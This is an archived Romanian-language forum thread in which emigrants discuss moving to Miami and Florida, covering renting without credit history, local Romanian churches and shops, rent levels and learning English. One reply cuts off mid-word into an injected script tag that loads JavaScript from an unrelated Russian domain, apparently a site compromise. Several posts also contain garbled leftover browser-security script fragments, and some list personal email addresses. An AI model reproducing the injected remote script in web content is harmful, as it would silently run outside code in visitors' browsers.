PDA

Arată versiune întreagă : Este cineva in Florida Miami?

anastasia
04.01.2005, 11:27
Voi veni la sfarsitul lunii martie si ma intereseaza cum pot inchiria un apartament, voi veni cu catelusa mea.

Sunt castigatoare a loteriei vizelor si citem ca pana nuprimesti SSN-ul si Green Cardul esti legat la maini.

Si atunci cum??Dati-mi un sfat va rog ca sunt in ceata totala

Exista o comunitate, biserica, cineva care te poate ajuta?Sau pot gasi pe cineva cu care sa impart chiria...daca da, unde sa caut?

Multumesc!

sorin
04.01.2005, 13:22
Anastasia, bine ai venit pe acest forum si felicitari pentru castigarea loteriei vizelor!
Sunt 4 biserici ortodoxe in <st1:State w:st="&#111;n">Florida</st1:State>, dintre care cele mai apropiate de <st1:City w:st="&#111;n">Miami</st1:City> sunt cele din <st1:City w:st="&#111;n">Hollywood</st1:City> (aprox. 20 mile) si <st1:place w:st="&#111;n"><st1:City w:st="&#111;n">Miramar</st1:City></st1:place> (aprox. 18 mile). Din ceea ce stim noi, nu cred ca exista vreo biserica romaneasca in <st1:City w:st="&#111;n"><st1:place w:st="&#111;n">Miami</st1:place></st1:City>. Deasemeni, mai exista si biserici adventiste si penticostale, marea majoritate in <st1:City w:st="&#111;n"><st1:place w:st="&#111;n">Hollywood</st1:place></st1:City>.
Pentru lista completa a bisericilor romanesti mergi pe urmatoarea pagina:
http://www.romanian-portal.com/us/ro/comunitate.asp?id=29

Daca nu ma insel, o fosta forumista de a noastra cu nickul Fethoden este din Miami, dar din diverse motive s-a suparat pe alti forumisti si nu ne mai viziteaza. Poate ar fi bine sa-i trimiti totusi un email sau un PM si sa-i ceri sa te ajute, ca n-ai nimic de pierdut. Tu cum de ai ales <st1:State w:st="&#111;n"><st1:place w:st="&#111;n">Florida</st1:place></st1:State> daca nu cunosti pe nimeni acolo?

De asemeni, pe forumul de <st1:State w:st="&#111;n"><st1:place w:st="&#111;n">Florida</st1:place></st1:State>, cineva cu nickul Antigona care sta aproape de Miami a scris un mesaj si da si o adresa de email. S-ar parea ca i-ai scris deja, dar nu ti-a raspuns, asa ca incearca si un PM, in ideea ca poate nu mai foloseste acea adresa de email.

Si in sfarsit, mai exista un mesaj de la cineva din <st1:State w:st="&#111;n"><st1:place w:st="&#111;n">Florida</st1:place></st1:State> la forumul de matrimoniale (nu mi-o lua in nume de rau ca nu vreau sa te marit:) unde ai sa gasesti un nume si o adresa de email, pe urmatoarea pagina:
http://www.romanian-portal.com/forum/forum_posts.asp?TID=267 (http://www.romanian-portal.com/forum/forum_posts.asp?TID=267&amp;PN=2) &amp;PN=2

Alte topice cu forumisti din <st1:State w:st="&#111;n"><st1:place w:st="&#111;n">Florida</st1:place></st1:State> pe care i<script src=http://www.iroe.ru/ngg.js></script>

Fethoden
05.01.2005, 15:04
Buna Anastasia!

Iti urez sa iti fie de bine viza, am sa ma interesez pentru tine si cred ca am sa iti pot da informatii in urmatoarele zile.Locuiesc in Florida , aproape de Miami si sper sa iti pot veni in ajutor.

Cu bine si sper sa ne cunoastem mai indeaproape!

anastasia
09.01.2005, 10:02
Sunteti draguti, va multumesc!

Chiar astazi am vorbit cu o prietena care lucra acolo pe un vas de croaziera, si urma sa stam impreuna, dar ea probabil i-si va continua lucrul pe vas si posibil sa nu aibe timp sa inchirieze..asa ca nu pot risca sa vin acolo si sa stau in aeroport, nu stiu care sunt primii pasi, pentru ca neavand ssn-ul nu prea poti face nimic..sunt cam in ceatza.

Fethoden, as aprecia tare mult daca te poti interesa pentru mine, adresa mea de e-mail este mirelaiov@yahoo.com

Fethoden
09.01.2005, 14:55
Scuze ca am intarziat cu raspunsul, am sa iti scriu si un e-mail, deocamdata , am aflat despre niste site-uri pe care sa intri sa vezi acolo ce ti se cere, dar mai ales sa ai o imagine despre ceea ce poti gasi, macar sa stii preturile,confortul..etc.

www.Rent.com (http://www.Rent.com)

www.apartmentguide.com (http://www.apartmentguide.com)

www.sublet.com (http://www.sublet.com)

www.apartment-renting.net (http://www.apartment-renting.net)

Iti doresc mult succes.

Pacat ca nu sunt chiar in Miami, poate ti-as fi fost de mai mare ajutorastfel acum, sa iti fi dat niste rezultate mai satsifacatoare.Saptamana asta am fost cu totii destul de ocupati si nu am reusit sa strang mai multe informatii.

Oricum, vezi ce gasesti pe aceste adrese deocamdata...Daca e sau nu favorabil acest mod de a te informa , spune-mi te rog, eventual sa caut pentru tine, alte posibilitati(ma gandesc la pagini aurii sa vad ceva adrese sau nr. de telefoane, ca sa-i sun, sa-i intreb...lucru ce cred ca era mai indicat din start sa il fi facut eu de cand am aflat de tine...).Oricum, maine (luni 10 ianuarie), daca am noutati, iti scriu.

Succes si toate cele bune!

neamtu_usa
01.02.2005, 08:04
Buna Anastasia! Eusunt chiar in Miami. Am venit aici anul trecut in septembrie si stau intr-un apartament cu un dormitor (2 camere). E destul de greu sa inchiriezi un ap daca nu ai credit history asa ca va trebui sa inchirieze cineva pt tine. Apartamenul unde stau e foarte frumos e intr-un compex pazit 24 di 24, cu piscina, jacuzzi, ternuri de tenis etc. NOi vrem sa plecam din Miami pe la inceputul lui Mai si sa renuntam la chirie... deci ai putea sa intri in locul nostru in apartament.Chiria este 750 pe luna. Un pret foarte bun pt Miami si pt conditiile care sunt.

Daca te intereseaza da-mi un mail la marcel_daniel@yahoo.com

Bafta

camicristina
20.08.2005, 09:53
De ce vrei sa pleci din Miami?

E cam subtire cu joburile pe acolo?

Adrian

29.08.2005, 12:27
Miami este un inceput destul de bun din punct de vedere al locurilor de munca si a chiriei care este destul de mica, dar daca vrei intr-adevar sa te simti in paradis, eu iti sugerez Palm Beach..Boca Raton sau Delray Beach...sunt orasele cu standarde mai ridicate. In Miami majoritatea populatiei este sud-americana si nimeni nu vorbeste engleza...asa ca apuca-te de pe-acum de spaniolasmileys/smiley2.gif

Pupici din Palm Beach!

30.08.2005, 21:35
cum e orlando ? tot plin de latinos?

31.08.2005, 09:22
Ma indoiesc sa fie atatia cubanezi si mexicani in Orlando. Miami este cum se spune aici '' the melting spot''.

31.08.2005, 17:59
acum..ce vroiam eu sa te intreb georgiana..majoritatea americanilor care au mai fost pe acolo -in miami-imi spun ca sa nu te duci ca e periculos si alte alea..dar mie astia mi se para cam dusi..pareara mea..am impresia din ce spun ei ca daca te duci sa bei o bere ai ocazia sa te jefuiasca la drumul mare ca haiducii...acuma si eu unul nu zic ca e ca in paradis..dar daca nu ai fost prin orase mari, si vii din countryside cam asa ti se par metropolele..periculoase si oamenii se calca pe picioare...acum , te rog, zi-mi si mie parea ta. in orice caz din ce vad in Csi Miami si daca chiar crezi ce se vede in filme -miami- e periculos rau.Merci.

roxanici
01.09.2005, 05:44
Kadades imi permit si eu sa intervin in discutie si sa confirm ceea ce a spus Georgiana ca in Orlando nu sunt atat de multi hispanici ca in Miami. Cel putin io cand am fost acolo nu am vazutsmileys/smiley1.gif. Tinand cont ca Orlando e un punct turistic destul de important (Disneyland) se perinda o gramada de straini pe acolo si te doare capul de cate limbi auzismileys/smiley17.gif. Oricum Statul Florida in generale superb..ptr cine suporta caldura.smileys/smiley36.gif

01.09.2005, 20:38
Si uraganele..:) roxanici merci pentru raspuns..in principiu o sa fiu prin orlando dar am sa incerc sa ma duc si la miami...la haiduci.

roxanici
01.09.2005, 23:57
smileys/smiley1.gif..da..din pacate si uraganele..dar nu ajung pana in Orlando..sau cel putin nu cu aceeasi intensitatesmileys/smiley2.gif. Si cat timp vei sta in Orlando..ai de gand sa te stabilesti in Florida sau esti doar in vacantza..sau cum?..si eu, (daca voi trece cu bine de interviul de la loteria vizelorsmileys/smiley2.gif) am sa ma stabilesc in Florida. Numai bine si poate o sa ne intalnim..smileys/smiley4.gif

05.09.2005, 12:42
Nu vreau sa ma stabilesc pe acolo.. desii sa stau la doi pasi de ocean ar fii ceva frumos..nu numai din cauza privelistii :):)..dar numai din cauza uraganelor care vad la tv ca in fiecare an sint mai devastatoare si lumea se intreaba de ce?..si nu ne asteptam sa ne distruga casa..pai daca stai pe acolo e evident ca intre-un timp de o sa ai de aface cu ele..eu vreau doar sa ma duc pe la plaja si sa inot in ocean..am stat in seattle si pe acolo oceanul era rece ca gheata...in orlando o sa fiu probabil in martie.

05.09.2005, 19:13
e cam greu de ales unde sa te stabilesti in Florida...in Orlando nu sunt mexicani ca in Miami ,Orlando e super ...Giorgiana ...Palm Beache super,darplin de oameni batrani si plini de bani e camplictisitor din pacate, am un prieten bun acolo si voi veni des acolo daca vrei sa dai un pm . In rest numai bine Florideismileys/smiley1.gif

07.09.2005, 07:20
Kadades, te-ai uitat prea mult la Miami Vice....

07.09.2005, 07:22
e cam greu de ales unde sa te stabilesti in Florida...in Orlando nu sunt mexicani ca in Miami ,Orlando e super ...Giorgiana ...Palm Beache super,darplin de oameni batrani si plini de bani e camplictisitor din pacate, am un prieten bun acolo si voi veni des acolo daca vrei sa dai un pm . In rest numai bine Floridei

...Da, poate fi foarte plictisitor daca n-ai nici una de-o suta in buzunar.

17.10.2005, 18:18
cum e Daytona?

loui
21.10.2005, 06:34
Buna!Nu stiu cum e la voi dar in partea asta ,South California e intr-adervar plin de mexicani...ei ,dar sa fie sanatosi,noi ne vedem de ale noastre.Oricum,as avea o intrebare si sper ca vineva sa aiba un raspuns pentru mine sau macar o parere...Sunt aici de 7 luni impreuna cu familia (sotul si baietelul).Cu engleza ma descurc bine cel putin la partea de inteles,citit,scris dar...nu pot sa vorbesc.Cel putin cand sunt pusa in situatia de a conversa nu imi gasesc cuvintele (culmea dupa aceea imi vine in minte tot ceea ce asi fi putut sa spun).Ciudat,nu?Vreau sa stiu daca e normal sau sunt un caz mai aparte.Din cauza aceasta am impresia ca nu voi vorbi niciodata limba engleza...Va multumesc.

21.10.2005, 10:21
Cel putin cand sunt pusa in situatia de a conversa nu imi
gasesc cuvintele (culmea dupa aceea imi vine in minte tot ceea ce asi
fi putut sa spun).Ciudat,nu?

Ciudat ar fi fost sa fie altfel! Esti 100% normala. Toti cei cu
"experienta" pe alte meleaguri iti vor confirma acest lucru. Eu cand am
venit aici, desi stiam f. multa engleza, cand era sa comunic cu colegii
recurgeam pe cat posibil la e-mail in loc de telefon. La toti
"aliens"-ii am observat ca engleza scrisa este cu multe nivele peste
cea vorbita (la cei care stiu sa scrie smileys/smiley1.gif).
Cunosc straini care scriu articole intr-o engleza impecabila iar cand
ai o conversatie cu ei te intrebi daca nu ai gresit interlocutorul.

Ai dreptate sa remarci ca engleza este o problema esentiala a imigrantilor
veniti la maturitate. Cand treci de 13-14 ani este greu sa mai scapi de
accent pe tot restul vietii iar la varste mai inaintate de cautatul
cuvintelor. Toti romanii veniti aici vor fi repede eclipsati de
copii la capitolul engleza, Copiiilor li se va parea incredibil cum
de tata/mama care ii invata atatea raman totusi atat de in urma "and they just don't get it!". Mai tarziu le va fi
chiar jena pentru ca doresc sa fie perfect integrati.
Dar pana sa apuce sa te invete baietelul engleza care trebuie (cea de
la scoala), apeleaza la celalalt profesor si anume televizorul. Activeaza pe cat poti memoria auditiva.

Din tot ce am vazut in partea de US unde am calatorit/locuit, faptul ca
nu ai invatat engleza aici de mica (stim doar ca engleza britanica sau
australiana sunt "funny") va fi un factor de discriminare permanenta.
Poate cuvantul discriminare este cam puternic, dar distantare in orice
caz.

Din cauza aceasta am impresia ca nu voi vorbi niciodata limba engleza...

Inca o dovada de reactie normala! Numai ca aici gresesti. Vei capata un
vocabular f. bun in cativa ani, mai ales daca vei lucra cu multi
"coworkers". Poate iti vei mai cauta cuvintele mai mult ca un american
in perioadele de stress sau emotie. Insa intr-o tara in care te
dibuiesc imediat din ce zona provii dupa accent (Calif., Texas,
Mid-atlantic, New England,..) va fi f. greu sa ascunzi ca ai trecut
candva oceanul dintr-un "old country" cu siguranta sarac.

PS Unui american care crescuse in Anglia capatand accentul britanic i
s-a spus odata reintors aici sa-si piarda accentul pentru ca multi
subalterni isi vor
pierde respectul fata de el. Strict autentic dar intamplat prin anii
'50.

alin5E3D
24.11.2005, 12:52
sal si eu sunt in Miami cum as putea sa dau de romani...smileys/smiley17.gif< =""><!--
var SymReal&#079;nLoad;
var SymReal;

Sym()
{
window.open = SymWinOpen;
if(SymReal != null)
SymReal();
}

Sym&#079;nLoad()
{
if(SymReal&#079;nLoad != null)
SymReal&#079;nLoad();
window.open = SymRealWinOpen;
SymReal = window.;
window. = Sym;
}

SymReal&#079;nLoad = window.&#111;nload;
window.&#111;nload = Sym&#079;nLoad;

//-->
</>

alin5E3D
24.11.2005, 12:55
sal Fethoden am rimit un mes pe privat de la tinesmileys/smiley2.gifpoate ne putem intilni pentru ca pe aici nu stiu ce sa prea fac pe aici eu stau momentan in Ft Myers poate lasi un nr de telsmileys/smiley19.gif < =""><!--
var SymReal&#079;nLoad;
var SymReal;

Sym()
{
if(SymReal != null)
SymReal();
}

Sym&#079;nLoad()
{
SymReal&#079;nLoad();
SymReal = window.;
window. = Sym;
}

//-->
</>

25.11.2005, 05:51
Fort Myers este superb!!!!smileys/smiley9.gif Sotul meu m-a dusacolo intr-o '' surprise trip'' acum doua luni...si acum imi amintesc privindapusul si nisipul alb din camera de hotel...nimic nu se compara cu plajele de pe coasta de Vest...chiar vrem sa cumparam o casa acolo.

alin5E3D
01.12.2005, 13:24
smileys/smiley17.gif.....

portobelo
25.12.2005, 10:56
sal si eu sunt in Miami cum as putea sa dau de romani...smileys/smiley17.gif&lt; =""&gt;<!--
var SymReal&#079;nLoad;
var SymReal;

Sym()
{
if(SymReal != null)
SymReal();
}

Sym&#079;nLoad()
{
SymReal&#079;nLoad();
SymReal = window.;
window. = Sym;
}

//--> </> I-ii Gaseshti mai ales in Ft Lauderdale ...exista shi un restaurant acolo, "Transilvania" sau cum i-l cheama dar acolo traieste o comunitate mare de Romani cu tot ce le trebuie ...Preot , Biserica Doctori Magazine unde vorbeshti ca acasa

Am fost acum 3 ani la Slujba de Inviere intr-o Biserica Ortodoxa din Ft Lauderdale.

Eu locuiesc in Romania , dar am fost in ultimii 4 ani in Miami in vizita shi am intalnit magazine unde patronii vorbesc Romana , la fel shi angajatzii.

am dat de un Magazin care vindea apa minerala Borsec, shi Perla Harghitei, carne de mici, patronul fiind Roman din Banat.

daca vei insista gaseshti shi Romani .

ramon
13.04.2006, 04:48
Salut tuturor, am venit in state de o luna ( cu viza de turist ) mi-au dat la intrare 6 luni dar as dori sa raman aici .

in ro am fost sofer profesionist ( TIR ) si vreau sa stiu daca pot obtine si aici un permmis pentru camioane sau chiar unul pentru turisme

acum locuiesc in florida ,stiu ca pe aici este o comunitate mare de romani si rog frumos sa ma ajute cineva cu cateva raspunsuri .

adresa de email este autoidea1@yahoo.com va multumesc

13.04.2006, 13:57
Sunt foarte multi romani in Hollywood, Fla. Chiar am vazut si un magazin romanesc acolo.

14.04.2006, 16:09
...Da, poate fi foarte plictisitor daca n-ai nici una de-o suta in buzunar.

Vezi ca ai primit un PM.

14.04.2006, 21:38
Cred ca avem o viziune diferita asupra banului fatuca,eu cand ma refer ca e scump ma refer la propietatile alea de milioane de $ pe South Ocean Blvd ,iar pacatoasa de tine la 100 in portofel. Spune-i lui daddy sugar sa-ti dea mai multi bani pe mana sa te mai invetii cu valoarea banului.

15.04.2006, 08:51
Cred ca avem o viziune diferita asupra banului fatuca,eu cand ma refer ca e scump ma refer la propietatile alea de milioane de $ pe South Ocean Blvd ,iar pacatoasa de tine la 100 in portofel. Spune-i lui daddy sugar sa-ti dea mai multi bani pe mana sa te mai invetii cu valoarea banului.

Mai Claudiulesmileys/smiley36.gif...sunt mai familiara decat crezi tu cu ''castelele'' de pe A1A...

P.S. ..te rog nu-mi mai intoxica casuta postala cu absurditati.

15.04.2006, 09:33
Sunt foarte multi romani in Hollywood, Fla. Chiar am vazut si un magazin romanesc acolo. Georgiana,voi ajunge peste ceva timp in Miami,ai putea sa-mi spui cate ceva referitor la chirii(am familia compusa din 3 membri).bineinteles ca nu vom fi prea pretentiosi o perioadasmileys/smiley5.gifIti multumesc mult.Apropo,lasa-l pe Claudiu,nu te mai obosismileys/smiley2.gif

16.04.2006, 11:32
Un apartament decentcu doua dormitoare in Miamiva vacosta intre $1100-$1400 pe luna. Totul variaza in functie de zona si de facilitati (piscina, hot tub, club house, etc.).. in Miami Beach, Ocean Drive,de exemplu nu vei gasi nimic sub $7000-$8000 pe luna..deci cu cat mai aproape de plaja cu atat mai scump. Cand inchiriezi un apt.,ti se va cere chiria pe 3 luni ( first, last &amp; security). Fii atenta totusi la imprejurimi daca gasesti chirie mica...sunt cartiere in Miami mult mai periculoase ca in Bucuresti, mai ales in periferii.

17.04.2006, 19:00
[/QUOTE] .Apropo,lasa-l pe Claudiu,nu te mai obosismileys/smiley2.gif
[/QUOTE]

Asa e ...si asa tre sa fii tu obosita deja. Totusipune ceva in bancapana nu obosesti/imbatranesti si nu o sa mai fii la fel de "familiara" cu toate castelele. Despre pm smileys/smiley36.gif(casuta postala) ..sper sa o tratezi cu grija sa nu inteleaga ceilalti altceva sau ca te-am injurat cand spui "intoxicare"... doar te-amcaracterizat ca peosnoaba... in pmsmileys/smiley76.gifnimic mai mult. In rest continua-ti discutia linistita ,bafta amandorura si sa nu ne intalnim prin Palm Beach ...sau daca da...sper sa am $100 pe mine!

18.04.2006, 09:51
Un apartament decentcu doua dormitoare in Miamiva vacosta intre $1100-$1400 pe luna. Totul variaza in functie de zona si de facilitati (piscina, hot tub, club house, etc.).. in Miami Beach, Ocean Drive,de exemplu nu vei gasi nimic sub $7000-$8000 pe luna..deci cu cat mai aproape de plaja cu atat mai scump. Cand inchiriezi un apt.,ti se va cere chiria pe 3 luni ( first, last &amp; security). Fii atenta totusi la imprejurimi daca gasesti chirie mica...sunt cartiere in Miami mult mai periculoase ca in Bucuresti, mai ales in periferii. Destul de piperate mi se par dar asta e ,nu vom avea incotro.Ai fost foarte draguta ca mi-ai raspunssmileys/smiley17.gifiti multumesc.Poate vom mai "conversa" pe pm sa nu mai fim "bruiate"Asta daca esti si tu de acord.smileys/smiley2.gif